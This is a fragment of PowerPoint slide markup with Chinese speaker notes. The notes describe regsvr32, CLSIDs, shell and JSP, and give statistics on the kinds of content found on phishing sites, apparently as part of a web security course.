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63"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="316" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="268" r:id="rId17"/>
    <p:sldId id="269"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7" r:id="rId60"/>
    <p:sldId id="314" r:id="rId61"/>
    <p:sldId id="315"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9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47789.ht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baike.baidu.com/view/449909.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128511.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baidu.com/s?wd=Web%E7%BD%91%E9%A1%B5&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1YLmv7bmywBm1I-mywhrAfd0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3ErjnsP1T4njm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baidu.com/s?wd=JSP%E5%8A%A8%E4%BD%9C&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1YLmv7bmywBm1I-mywhrAfd0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3ErjnsP1T4nj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www.baidu.com/s?wd=%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1YLmv7bmywBm1I-mywhrAfd0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3ErjnsP1T4njm" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baidu.com/s?wd=%E8%84%9A%E6%9C%AC%E8%AF%AD%E8%A8%80&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1YLmv7bmywBm1I-mywhrAfd0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3ErjnsP1T4njm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baidu.com/s?wd=Java%E8%AF%AD%E8%A8%80&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1YLmv7bmywBm1I-mywhrAfd0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3ErjnsP1T4nj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4821.ht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baike.baidu.com/view/764619.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p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Regsvr32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令用于注册</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>动态链接库文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统提供的用来向系统注册控件或者卸载控件的命令，以命令行方式运行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>及以上系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>windows\system32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件夹下；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>regsvr32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>winnt\system32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件夹下。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="灯片编号占位符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6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67586" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据显示，在钓鱼网站最钟爱六大类欺诈内容，购物类网站占据主流，如假淘宝占</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>17%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、假彩票分析占</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>13%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、非法的六和彩网站占</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>8%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，而伴随着电子商务的发展，互联网上直接经济活动的增多，购物类钓鱼网站依然会不断增加。诸如网购用户、网游爱好者、视频达人等人群是病毒团伙的主要目标，尤其是直接关乎经济利益的网络购物等上网行为更是成为了黑客的首要目标。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="灯片编号占位符 3"/>
          <p:cNvSpPr>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51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>同时它又是一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>程序设计语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。作为命令语言，它交互式解释和执行用户输入的命令或者自动地解释和执行预先设定好的一连串的命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="灯片编号占位符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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26626" name="备注占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>全称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JavaServer Pages)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Sun Microsystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>公司倡导和许多公司参与共同建立的一种使软件开发者可以响应客户端请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>而动态生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或其他格式文档的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>网页</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的技术标准。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>脚本语言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网页为整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>库单元提供了一个接口来服务于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的应用程序。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>代码和特定的预定义动作可以嵌入到静态页面中。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>句法增加了被称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>动作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标签，它们用来调用内建功能。另外，可以创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标签库，然后像使用标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标签一样使用它们。标签库提供了一种和平台无关的扩展服务器性能的方法。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>网页为整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>服务器端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>库单元提供了一个接口来服务于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的应用程序。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="灯片编号占位符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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CLSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统对于不同的应用程序，文件类型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象，特殊文件夹以及各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
